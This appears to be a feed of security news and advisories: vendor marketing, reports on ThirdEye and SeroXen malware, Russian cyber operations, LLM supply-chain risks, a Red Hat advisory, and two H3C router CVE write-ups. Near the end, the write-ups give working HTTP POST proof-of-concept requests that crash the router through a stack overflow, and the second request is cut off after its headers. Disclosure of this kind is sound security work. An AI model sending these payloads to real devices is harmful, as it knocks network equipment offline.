Categories: Business
#1 in Endpoint Protection, #1 ROI for Endpoint Management, #1 for EDR implementation.



(Read more...)




The post Top contenders in Endpoint Security revealed: G2 Summer 2023 results appeared first on Malwarebytes Labs.

Navigating the world of endpoint security is challenging, with numerous vendors stoking "Fear, Uncertainty, and Doubt" (FUD) and making bold claims that are difficult to verify. In times like these, the honest opinions of real users are invaluable for busy IT teams.

Enter G2, an industry-leading peer-to-peer review site. Each quarter, G2 releases reports highlighting the products with the highest customer satisfaction and strongest market presence.

In the G2 Summer 2023 Grid Reports, **Malwarebytes earned 19 "Leader" badges across five endpoint security categories (Antivirus, EDR, Endpoint Management, Endpoint protection platforms, Endpoint protection suites). We also received awards for the #1 spot in Endpoint Protection and the Easiest Setup for EDR, among many others**.

Let's take a closer look at how organizations evaluated solutions and what they said about using Malwarebytes.

****#1 Endpoint Protection: Highest Rated for Results, Relationship, and More****

Malwarebytes Endpoint Protection (EP), the essential foundation of our EDR and MDR offerings, won dozens of awards based on receiving the highest customer satisfaction score across a range of areas, including "Best Results," "Best Support," "Most Implementable," and more.

Dashboard for Nebula, the cloud-hosted security platform for EP and EDR

For example, Malwarebytes EP won the “**Best Results**” badge (highest overall Results score) by having the highest combination of estimated ROI, meets requirements, and likelihood to recommend scores. What some of our customers had to say:

> “Malwarebytes is easy to install and configure. It integrates with Windows 10 and runs silently in the background. Infection rate of Malware has dropped dramatically. If I run across a machine that has Malware, installing it cleans it up almost 100% of the time.”

Chris S.

> “Malwarebytes was able to detect and block a virus that our previous AV was not able to. Wish we had moved to this product sooner.”

Robert S.

> “I consider myself faithful to this software because Malwarebytes has taken me out of problems that other antivirus programs have not been able to solve. It is not a very heavy software and can run in the background without even noticing it thanks to the updates.”

Verónica M.

Customers also praised Malwarebytes for its friendly staff and exceptional support, for which we won the “**Best Relationship**” badge by having the highest combination of "Likely to Recommend," “Ease of business,” and “Quality of Support” ratings.

Here's what some of our customers had to say:

> “The support team started us off on the right track by getting us up and running in no time. Any questions I had before and after setup were answered quickly and thoroughly.”

Gary P.

> “Highly recommended, and their support team is the best you can ask for!”

Rifaat K.

****Easiest To Use EDR****

Our EDR solution, paired with our Vulnerability and Patch Management (VPM) modules, delivers an impressive return on investment by quickly enhancing your organization's security posture. Malwarebytes EDR is designed to be both efficient and cost-effective, allowing your team to see the benefits of your investment immediately.

By focusing on ease of use, quick implementation, and powerful security features without requiring an IT security army, Malwarebytes ensures that your organization is maximizing resources and receiving the best ROI in the industry.

Malwarebytes had the **best estimated ROI (payback period in months) in the enterprise Endpoint Management category, which evaluate products that help users keep track of devices in a system and ensure their software is secure and up to date**.

> “The best part about Malwarebytes is the set it and forget it. It has saved us so much time on deployment and remediation that it pays for itself in no time at all.”

Ron M.

> “It keeps our working environment much more secure than our previous solution. Much easier to manage in real time. This thing is a money saver and pays for itself.”

Tyson B.

**Most Implementable EDR: Seamless Setup and User-Friendly Experience**

On the Enterprise Implementation Index for Endpoint Detection & Response (EDR) Malwarebytes EDR clutched the #1 spot. With a seamless setup process, your team can spend more time focusing on what matters most: protecting your organization from cyber threats. Here’s how we won:

*   Malwarebytes EDR has an Implementation Score several points higher than the industry average.
*   Ease of Setup: Malwarebytes EDR scores several points higher than the industry average in ease of setup.
*   Average User Adoption: Malwarebytes EDR scores several points higher than the industry average in user adoption rate. 

> “The Nebula console is one of the most user-friendly interfaces we've come across. We can't recommend it enough.”

Justin N.

> “Malwarebytes makes it simple to deploy. Additionally, the user interface has minimal impact on the end-user, so its win-win. Support are happy to help when you do hit the occasional bump and the portal is easy to use and very responsive.”

John K.

> “If you are purchasing Malwarebytes, then you have made the correct choice. You will quickly see how easy it is to implement, and how great their support is.”

Mauro B.

> “Very easy to install and deploy, setup, and configure - for instance - a 5 machine setup would take roughly ~10 mins from start to finish.”

Verified User

> “Easy to use and implement, along with great support and support tools at your disposal, along with courses to help you become more familiar with the inner workings."

Doug C.

Two options to easily begin deployment with your endpoint users in Nebula

****Experience Malwarebytes for Business: Award-winning ROI, user-friendly, and effective threat defense****

Malwarebytes provides IT staff with award-winning business solutions, offering unmatched threat protection, a lightning-fast return on investment, and a smooth, speedy implementation.

Try Malwarebytes EDR today and join the ranks of those who have already discovered the amazing results, support, ROI, and more of our exceptional endpoint security solutions.

UPGRADE TO ENTERPRISE-GRADE PROTECTION

Top contenders in Endpoint Security revealed: G2 Summer 2023 results

A previously undocumented Windows-based information stealer called ThirdEye has been discovered in the wild with capabilities to harvest sensitive data from infected hosts.
Fortinet FortiGuard Labs, which made the discovery, said it found the malware in an executable that masqueraded as a PDF file with a Russian name "CMK Правила оформления больничных листов.pdf.exe," which translates to "CMK

A previously undocumented Windows-based information stealer called **ThirdEye** has been discovered in the wild with capabilities to harvest sensitive data from infected hosts.

Fortinet FortiGuard Labs, which made the discovery, said it found the malware in an executable that masqueraded as a PDF file with a Russian name "CMK Правила оформления больничных листов.pdf.exe," which translates to "CMK Rules for issuing sick leaves.pdf.exe."

The arrival vector for the malware is presently unknown, although the nature of the lure points to it being used in a phishing campaign. The very first ThirdEye sample was uploaded to VirusTotal on April 4, 2023, with relatively fewer features.

The evolving stealer, like other malware families of its kind, is equipped to gather system metadata, including BIOS release date and vendor, total/free disk space on the C drive, currently running processes, register usernames, and volume information. The amassed details are then transmitted to a command-and-control (C2) server.

A notable trait of the malware is that it uses the string "3rd\_eye" to beacon its presence to the C2 server.

There are no signs to suggest that ThirdEye has been utilized in the wild. That having said, given that a majority of the stealer artifacts were uploaded to VirusTotal from Russia, it's likely that the malicious activity is aimed at Russian-speaking organizations.

"While this malware is not considered sophisticated, it's designed to steal various information from compromised machines that can be used as stepping-stones for future attacks," Fortinet researchers said, adding the collected data is "valuable for understanding and narrowing down potential targets."

The development comes as trojanized installers for the popular Super Mario Bros video game franchise hosted on sketchy torrent sites are being used to propagate cryptocurrency miners and an open-source stealer written in C# called Umbral that exfiltrates data of interest using Discord Webhooks.

"The combination of mining and stealing activities leads to financial losses, a substantial decline in the victim's system performance, and the depletion of valuable system resources," Cyble said.

SeroXen infection chain

Video game users have also been targeted with Python-based ransomware and a remote access trojan dubbed SeroXen, which has been found to take advantage of a commercial batch file obfuscation engine known as ScrubCrypt (aka BatCloak) to evade detection. Evidence shows that actors associated with SeroXen's development have also contributed to the creation of ScrubCrypt.

The malware, which was advertised for sale on a clearnet website that was registered on March 27, 2023 prior to its shutdown in late May, has further been promoted on Discord, TikTok, Twitter, and YouTube. A cracked version of SeroXen has since found its way to criminal forums.

"Individuals are strongly advised to adopt a skeptical stance when encountering links and software packages associated with terms such as 'cheats,' 'hacks,' 'cracks,' and other pieces of software related to gaining a competitive edge," Trend Micro noted in a new analysis of SeroXen.

"The addition of SeroXen and BatCloak to the malware arsenal of malicious actors highlights the evolution of FUD obfuscators with a low barrier to entry. The almost-amateur approach of using social media for aggressive promotion, considering how it can be easily traced, makes these developers seem like novices by advanced threat actors' standards."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Newly Uncovered ThirdEye Windows-Based Malware Steals Sensitive Data

Swiss intelligence warns that Russia ramping up cyberattacks on infrastructure and cyber espionage as on-the-ground options evaporate.

Russia's diminishing position on the world stage has limited its physical options on the ground both for kinetic attacks and traditional spycraft — leaving Putin's regime increasingly reliant on cybercrime to carry out its oppositional activities against Ukraine and the rest of the West.

Switzerland's Federal Intelligence Service (FIS) released its 2023 security assessment on June 26 predicting that Russia will increasingly launch cyberattacks on critical infrastructure as part of its war strategy not just in Ukraine, but against NATO member states as well.

It also pointed to Moscow's dwindling human spy apparatus — and few options for shoring it up — as driving an uptick in cyber activity.

**Russia's Cybercrime Spree, a Spark for WWIII?**

Although neutral Switzerland maintains some distance from the direct impact of Russian cyberattacks, the FIS is concerned about follow-on affects within its borders.

Worryingly, the report assesses that cyberattacks on NATO-member state infrastructures could ultimately trigger the North American Treaty's Article 5 commitments to join in war against any nation that attacks a member state. The FIS added that NATO has suggested in the past that a cyberattack on critical infrastructure could, in fact, be considered a trigger under Article 5, kicking off a third world war.

In late March, evidence was leaked by Russian contractor NTC Vulkan detailing how Russian intelligence agencies use private companies to launch cyber threat campaigns across the world. The documents included materials for trainings run by Vulkan on how to takeover railroads and power plants.

Cyber threats to critical infrastructure fall into two categories, according to the FIS report: direct cyber attacks against infrastructure; and ransomware attacks that could potentially hobble supply chains.

"Attacks against critical infrastructure have widespread impacts," Timothy Morris, chief security advisor with Tanium tells Dark Reading. "Damage can run the gamut from disruptive inconveniences to economic stress to catastrophic life altering or threatening impacts. Also, collateral damage can happen with cyberattacks, as often happens with kinetic warfare."

Dangerously, throughout the Russian war against Ukraine, many ransomware attacks against infrastructure are being carried out by non-state actor threat groups, making their actions often unpredictable. Erratic behavior by a threat group not directly affiliated with the Russian state could cause a miscalculation in attributing a cyberattack, or prompting unnecessary escalation of hostilities," the FIS warned.

"The activities of non-state actors engaged in the war are still the main problem," the report said. "The threat and the unpredictability which such activities give rise to should not be underestimated, even if these threat actors have so far attracted more attention by announcing their intentions that by carrying them out."

The challenge in protecting critical infrastructure across multiple nations is a lack of common rules, according to John Anthony Smith, CEO of Conversant Group. 

"There are widely varying degrees of cyber defenses in place across these critical infrastructure sectors and entities, since the entities protecting critical infrastructure as well as providing oversight include both private and public sector organizations: no one agency or institution provides guidance, rules, or controls on how cybersecurity is conducted, tested, and configured," Smith explains.

**Russian Cyberespionage Supplants Real Spies**

Russian cyber threat actors are also increasingly responsible for gathering intelligence in lieu of actual human operatives on the ground, according to the report. The FIS noted that the phenomenon dates as far back as 2018 and the attempted murder of Sergei Skripal, a former Russian intelligence officer living inside the UK and acting as a double agent for the West.

The poisoning started an expulsion of Russian diplomats and intelligence officers from throughout the world that has continued in force since the invasion of Ukraine in February 2022. Mistrust of Russian diplomats, many of whom were declared _persona non grata_ by Western governments, will have a hard time recruiting and developing new sources and operating for years to come, the FIS added — meaning that cyber espionage and advanced persistent threats will have to fill the gap.

"The Russian leadership's war of aggression against Ukraine has made the work of its intelligence services more important, but at the same time has made it harder to operate," the FIS report said.

Callie Guenther, cyber threat researcher with Critical Start noted in response to the FIS assessment that the correlation between expelling spies and increased cyber espionage would be difficult to verify but sounds reasonable.

"While there's no direct evidence linking the expulsion of spies to an uptick in digital espionage, it's plausible that countries compensate for lost physical assets by enhancing their cyber intelligence efforts," Guenther tells Dark Reading. "Increased digital espionage poses significant threats, potentially disrupting vital infrastructure and leading to serious societal and economic consequences, compromising national security, and even triggering an act of war."

**Russian Intelligence Eyeing AI and Machine Learning**

The increasing digitization of information coupled with the capabilities of artificial intelligence and machine learning will lure cyberattackers to massive stashes of data stored by organizations like financial services providers, social media platforms, hotels, and critical infrastructure operators, the FIS warned.

The promise of accessing this breadth of sensitive data is also driving investments in AI and ML cyber threat intelligence capabilities by Russia, as well as by China and Iran, the FIS added.

Troves of stolen sensitive data could be used in a variety of ways by authoritarian governments, including to harass and intimidate opposition activists, interfere in elections, circumvent sanctions to buy and sell goods, and more the FIS report added.

Democracies are urged by the FIS to get ahead of Russian, Iranian, and Chinese intelligence services' implementation of espionage AI and ML tools by starting to regulate now.

"For states governed by democracy and the rule of law, this means, among other things that there is an urgent need to legislators and supervisory bodies to take a detailed look at the use of these capabilities," the report said.

It's incumbent on the cybersecurity community to be aware of the emerging cybersecurity tools used in warfare, Darren Guccione, CEO of Keeper Security, explains to Dark Reading about the FIS assessment.

"Cybersecurity is both national and international security, and must be prioritized as such," he says. "In the digital age, it's clear that cyber and traditional warfare tactics will continue to converge as threat actors use cyberattacks to both support and supplement physical attacks."

Russian Spies, War Ministers Reliant on Cybercrime in Pariah State

The combination of data science expertise, cloud resources, and Cato's vast data lake enables real-time, ML-powered protection against evasive cyberattacks, reducing risk and improving security.

**TEL AVIV, Israel, June 27, 2023** — Cato Networks, provider of the world's leading single-vendor SASE platform, introduced today real-time, deep learning algorithms for threat prevention as part of Cato IPS. The algorithms leverage Cato's unique cloud-native platform and vast data lake to provide highly accurate identification of malicious domains, which are often used in phishing and ransomware attacks. In testing, the deep learning algorithms identified nearly six times more malicious domains than reputation feeds alone. Cato's Security Research Manager, Avidan Avraham, and Cato Data Scientist Asaf Fried presented on the use of machine learning to detect C2 communications at the AWS Summit in Tel Aviv.

**Tapping Deep Learning to Stop Phishing and Ransomware Attacks**

Real-time identification of malicious domains and IPs is essential to stopping phishing, ransomware, and other cyber threats. The traditional approach – relying on domain reputation feeds to categorize and identify malicious domains – has proven far too inaccurate as domain generation algorithms (DGAs) enable attackers to quickly generate new domains, which lack reputation. At the same time, users continue to click through to malicious domains mimicking well-known brands (such as microsoftt\[dot\]com or amazonlink\[dot\]online) whose lack of reputation also makes detection by reputation feeds alone unreliable. 

Cato's real-time, deep-learning algorithms address both problems. The algorithms prevent access to DGA-registered domains by identifying those new domains infrequently visited by users and with letter patterns common to DGAs. They block cybersquatting by hunting for domains with letter patterns similar to well-known brands. And the algorithms stop brand impersonation by examining parts of the webpage, such as the favicon, images, and text. 

These radical advancements in network security are enabled by the cloud-native architecture of Cato’s technology. Real-time deep learning algorithms require significant compute resources to avoid disrupting the user experience. The Cato SASE Cloud provides those resources. In milliseconds, Cato inspects flows, extracts their destination domain, measures the domain's risk, and infers the necessary results from the traffic without disrupting the user experience. 

At the same time, deep learning models need extensive training data. The massive data lake underlying Cato SASE Cloud provides that resource. Built from the metadata of every flow traversing Cato and further enriched by 250+ threat intelligence feeds, the deep learning algorithms benefit from analyzing patterns across all Cato customers. Those insights are further enhanced by custom analyses derived from customers' traffic—the result: precise, algorithmic identification of suspicious domains. 

**Real-time Deep Learning Yields 6X Improvement in Threat Detection**

Cato Research Labs routinely observes tens of millions of network connection attempts to DGA domains from across the 1700+ enterprises using the Cato SASE Cloud. For example, of the 457,220 network connection attempts to DGA domains made in a sample period, only 66,675 (15 percent) were listed in the 250+ threat intelligence feeds consumed by Cato. By contrast, Cato algorithms identified the rest, over 390,000 additional DGA domains, a nearly six-fold improvement.

**Real-time, Deep Learning: Just One Part of Cato’s Multitiered Security Protection **

Cato's real-time, deep learning algorithms are not the only way Cato detects and stops threats. The Cato SASE Cloud's combination of SWG, NGFW, IPS, NGAM, CASB, DLP, RBI, and ZTNA provides multitiered protection against exploitations, disrupting cyberattacks at multiple points in MITRE's ATT&CK Framework.

The deep learning algorithms are the latest AI and ML additions to the Cato SASE Cloud. Cato has long used machine learning for offline analysis to solve problems at scale, such as OS detection, client classification, and automatic application identification. ChatGPT is also used in various ways, including automatically generating descriptions of threats for Cato's threat catalog. 

To learn more about Cato and its security capabilities, visit https://www.catonetworks.com/security-service-edge/.

**Supporting Quotes**

**Elad Menahem, senior director of security, Cato Networks**

"ML and AI are essential to defending against the ever-evolving, sophisticated, and evasive cyber-attacks. But that’s easier marketed than done,” says Elad Menahem, senior director of security at Cato Networks. “ML algorithms must be trained and re-trained on high-quality data to provide value. Cato’s data lake provides an enormous advantage in that area. Its convergence of rich networking data and security sources, coupled with its sheer scale, enables Cato to train algorithms in unique ways. Our current work is only the start of AI and ML innovation.” 

**Asaf Fried, Data Scientist, Cato Networks**

"Real-time ML must be continuously trained and updated to deal effectively with evasive attacks. A SASE cloud allows training on quality data at scale and continuous updates. Appliance-based solutions can’t offer either, making enterprises who rely on them for their network security an easier target."

**Supporting Resources**

*   Read Cato Blog 
*   Read about Elad Menahem
*   Read about Asaf Fried

*   For more information about Cato's news and activities, follow the company via Twitter, LinkedIn, Facebook, Instagram, and YouTube. 

**About Cato Networks**  
Cato provides the world's most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, into a global cloud service. Cato SASE Cloud optimizes and secures application access for all users and locations everywhere. Using Cato, customers easily replace costly and rigid legacy MPLS with modern network architecture based on SD-WAN, secure and optimize a hybrid workforce working from anywhere, and enable seamless cloud migration. Cato enforces granular access policies, protects users against threats, and prevents sensitive data loss, all easily managed from a single pane of glass. With Cato, businesses are ready for whatever's next.

Cato Networks Revolutionizes Network Security With Real-Time, Machine Learning-Powered Protection

Survey also uncovers 63% of respondents distrust ChatGPT while 51% question AI's ability to improve Internet safety.

**SANTA CLARA, Calif.****,** **June 27, 2023** **/PRNewswire/ --** Malwarebytes, a global leader in real-time cyber protection, today released the results of its consumer pulse survey, exposing deep reservations about ChatGPT, with optimism in startlingly short supply.

"An AI revolution has been gathering pace for a very long time, and many specific, narrow applications have been enormously successful without stirring this kind of mistrust," said Mark Stockley, Cybersecurity Evangelist at Malwarebytes. "At Malwarebytes, Machine Learning and AI have been used for years to help improve efficiency, to identify malware and improve the overall performance of many technologies. However, public sentiment on ChatGPT is a different beast and the uncertainty around how ChatGPT will change our lives is compounded by the mysterious ways in which it works."

The survey findings indicate that ChatGPT has a trust issue. Only 10% surveyed agreed with the following statement, "I trust the information produced by ChatGPT," while 63% disagreed. Similar sentiment was held among respondents in relation to accuracy with only 12% agreeing with the statement, "the information produced by ChatGPT is accurate," while over half (55%) disagreed.

Beyond concerns around trust and accuracy, a resounding 81% of respondents believed ChatGPT could be a possible safety or security risk with 52% of respondents calling for a pause on ChatGPT work for regulations to catch up – echoing similar tech luminary concerns voiced earlier this year. 

**Key Findings**

Despite the avalanche of ChatGPT media coverage and online chatter, only 35% of respondents agreed with the statement "I am familiar with ChatGPT," significantly less than the 50% that disagreed.

Of those who said they were familiar with ChatGPT:

*   12% agree the information produced by ChatGPT is accurate
*   81% are concerned about possible security and safety risks
*   63% distrust ChatGPT information
*   51% question whether AI tools can improve internet safety 
*   52% want ChatGPT developments paused in order for regulations to catch up

To read the full findings, visit our blog: www.malwarebytes.com/blog/news/2023/06/chatgpt.

To read more about the latest threats and cyber protection strategies, visit our newsroom, or follow us on Facebook, Instagram, LinkedIn, TikTok, and Twitter.

**Survey Methodology**

Malwarebytes conducted a pulse survey of its newsletter readers across the globe between May 29 and May 31, 2023, via the Alchemer Survey platform. In total, 1449 people responded.

**About Malwarebytes**

Malwarebytes believes that when people and organizations are free from threats, they are free to thrive. Founded in 2008, Malwarebytes CEO Marcin Kleczynski had one mission: to rid the world of malware. Today, Malwarebytes' award-winning endpoint protection, privacy and threat prevention solutions along with a world-class team of threat researchers protect millions of individuals and thousands of businesses across the globe daily. Malwarebytes solutions are consistently recognized by independent tests including MITRE Engenuity, MRG Effitas, AVLAB and AV-TEST (consumer and business). Customers award Malwarebytes for being the most implementable and most usable endpoint protection product with the best results on G2 and Gartner Peer Insights. The company is headquartered in Californiawith offices in Europe and Asia. For more information and career opportunities, visit https://www.malwarebytes.com.

Malwarebytes ChatGPT Survey Reveals 81% are Concerned by Generative AI Security Risks

Developers' enthusiasm for ChatGPT and other LLM tools leaves most organizations largely unprepared to defend against the vulnerabilities that the nascent technology creates.

Organizations' rush to embrace generative AI may be ignoring the significant security threats that large language model (LLM)-based technologies like ChatGPT pose, particularly in the open source development space and across the software supply chain, new research has found.

A report by Rezilion released June 28 explored the current attitude of the open source landscape to LLMs, particularly in their popularity, maturity, and security posture. What researchers found is that despite the rapid adoption of this technology among the open source community (with a whopping 30,000 GPT-related projects on GitHub alone), the initial projects being developed are, overall, insecure — resulting in an increased threat with substantial security risk for organizations.

This risk only stands to increase in the short-term as generative AI continues its rapid adoption throughout the industry, demanding an immediate response to improve security standards and practices in the development and maintenance of the technology, says Yotam Perkal, director of vulnerability research at Rezilion.

"Without significant improvements in the security standards and practices surrounding LLMs, the likelihood of targeted attacks and the discovery of vulnerabilities in these systems will increase," he tells Dark Reading.

As part of its research, the team investigated the security of 50 of the most popular GPT and LLM-based open source projects on GitHub, ranging in length of development time from two to six months. What they found is that while they were all extremely popular with developers, their relative immaturity was paired with a generally low security rating.

If developers rely on these projects to develop new generative-AI-based technology for the enterprise, then they could be creating even more potential vulnerabilities against which organizations are not prepared to defend, Perkal says.

"As these systems gain popularity and adoption, it is inevitable that they will become attractive targets for attackers, leading to the emergence of significant vulnerabilities," he says.

**Key Areas of Risk**

The researchers identified four key areas of generative AI security risk that the adoption of generative AI in the open source community presents, with some overlap between the groups:

*   Trust boundary risk; 
*   Data management risk; 
*   Inherent model risk; 
*   And basic security best practices.

_**Trust boundaries**_ in open source development help organizations establish zones of trust in which they can have confidence in the security and reliability of an application's components and data. However, as users enable LLMs to use external resources such as databases, search interfaces, or external computing tools — thus greatly enhancing their functionalities — the inherent unpredictability of LLM completion outputs can be exploited by malicious actors.

"Failure to address this concern adequately can significantly elevate the risks associated with these models," the researchers wrote.

_**Data-management risks**_ such as data leakage and training-data poisoning also expose enterprises to risk if not addressed by developers when working not just with generative AI, but any machine-learning (ML) system, the researchers said. Not only can LLM unintentionally leak sensitive information, proprietary algorithms, or other confidential data in its responses, threat actors also deliberately can poison an LLM's training data to introduce vulnerabilities, backdoors, or biases that can undermine the security, effectiveness, or ethical behavior of the model, the researchers warned.

_**Inherent underlying model risks**_ meanwhile account for two of the top LLM security problems: inadequate AI alignment and overreliance on LLM-generated content. "In fact, OpenAI, the creator of ChatGPT, warns its users about these risks in the main ChatGPT interface," the researchers noted in the report.

These risks refer to the phenomenon of generative AI like ChatGPT returning false or fabricated data sources or recommendations, commonly called "hallucinations," which researchers from Vulcan Cyber's Voyager18 already have warned could open up organizations to supply-chain attacks. This can occur when a developer asks ChatGPT or another generative AI solution from recommendations for code packages that don't exist, both Vulcan and Rezilion researchers noted. An attacker can identify this and publish a malicious package as a substitute, which developers will then use and write directly into an application.

Other users, unaware of the malicious intent, can then pose similar questions to ChatGPT, and the risk spreads from there across the supply chain because the AI model is unaware of the code manipulation, they noted. "Consequently, unsuspecting users may unknowingly adopt the recommended package, putting their systems and data at risk," the researchers wrote.

And finally, general security best-practice risk stems from open source adoption of generative AI, in the areas of improper error handling or insufficient access controls (which are not unique to LLMs or ML models). An attacker can exploit the information in the LLM error messages to gather sensitive information or system details, which they can then use to launch a targeted attack or exploit known vulnerabilities, the researchers said. And insufficient access controls also could allow users with limited permissions to perform actions beyond their intended scope, potentially compromising the system.

**How Organizations Can Prepare, Mitigate Risk**

Rezilion researchers presented specific ways that organizations can mitigate each of these risks, as well as overall advice for how they can prepare as the open source community continues to embrace these models for next-generation software development.

The first step to this preparation is an awareness that integrating generative AI and LLMs comes with unique challenges and security concerns that may be different than anything organizations have encountered before, Perkal says. Moreover, the responsibility for preparing and mitigating LLM risks lies not only with organizations integrating the technology but also the developers involved in building and maintaining these systems, he notes.

As such, organizations should adopt what Perkal calls a "secure-by-design" approach when implementing generative AI-based systems, he says. That entails leveraging existing frameworks like the Secure AI Framework (SAIF), NeMo Guardrails, or MITRE ATLAS to incorporate security measures directly into their AI systems, Perkal says.

It's also "imperative" that organizations monitor and log LLM interactions and regularly audit and review the AI system's responses to detect potential security and privacy issues, and then to update and tweak the LLM accordingly, he concludes.

Generative AI Projects Pose Major Cybersecurity Risk to Enterprises

Red Hat Security Advisory 2023-3814-01 - Migration Toolkit for Runtimes 1.1.1 ZIP artifacts. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Migration Toolkit for Runtimes security update  
Advisory ID:       RHSA-2023:3814-01  
Product:           Migration Toolkit for Runtimes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3814  
Issue date:        2023-06-27  
CVE Names:         CVE-2023-2798 CVE-2023-22899   
=====================================================================

1. Summary:

An update is now available for Migration Toolkit for Runtimes.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Migration Toolkit for Runtimes 1.1.1 ZIP artifacts

Security Fix(es):

* htmlUnit: Stack overflow crash causes Denial of Service (DoS)  
(CVE-2023-2798)

* zip4j: does not always check the MAC when decrypting a ZIP archive  
(CVE-2023-22899)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2185278 - CVE-2023-22899 zip4j: does not always check the MAC when decrypting a ZIP archive  
2210366 - CVE-2023-2798 htmlUnit: Stack overflow crash causes Denial of Service (DoS)

5. References:

https://access.redhat.com/security/cve/CVE-2023-2798  
https://access.redhat.com/security/cve/CVE-2023-22899  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes&downloadType=distributions

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJsFtdzjgjWX9erEAQjoDQ/8DerK2ZpDQzd5Q+gZ6zP1DfEwEABT5jlD  
c6j89Cj0/jOfr3OCWC4pAyqNtSgfDxtNraND3HASPoewamK4fAL9aS0NC+Nq9U7s  
0Iz0IHymbtJGRRnyhzn47LrTWQ2TFX0nYae22LO+6Qk6agtqZvTrSSQMNyKdkNlC  
dg6kuMHO8tSxjqgKe7XZERXELJeBk2MuLrPdCBPCIhTrXnmPUEYNiSUEvKrZhl2i  
slAclvJ6NYVmO0zkI8guTOOGh2m+RDCghxH5mYdX5eUgkwQdUHLn15nYfK/DXvt0  
WJqfeUKbrSUy59FXr31HexXJ2GpB3YkMU/W8JyUIolOOa4XKhOv24FaZhsvREGjM  
p9qG5uH0iSIgIPNly98wwSOtwdVdPJvPCuPM60tc/w9brfZWOcT/vbR8x9J54q1a  
7SqEpP2a4aESDqoiX57l/zcOL80fNpfuoi1TKYHefO1wICIIc85BwpFOl8LM2r9C  
JkEU9p5EuEhW2UNd1oPRwXhldXWKIdHdTt2Rwa84DkrorwcazOWhrk1CX/9ZEU2S  
fj/bxN7+pR9wDQSEKrAfVneXjbHEHIVXQ4W6XV1wrBHP3fWPwEpK2j8Jjn3sKzGI  
BwZ4RwpanaUXskhJWSrSywv+Yrm6DojrK/4bLcVCiASFuWbYRf4HVzrSq15vpnea  
prJQFb8bWRs=  
=uXt0  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3814-01

A stack overflow in the AddWlanMacList function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is AddWlanList, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v7 on the stack. The parameter %[^;] of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=AddWlanMacList&param=1;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;;

**Result**

the process webs restart

CVE-2023-34935: vuln/H3C_B1STW/CVE-2023-34935.md at main · h4kuy4/vuln

A stack overflow in the UpdateMacClone function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is UpdateMacClone, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v9 on the stack. The parameter %s of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

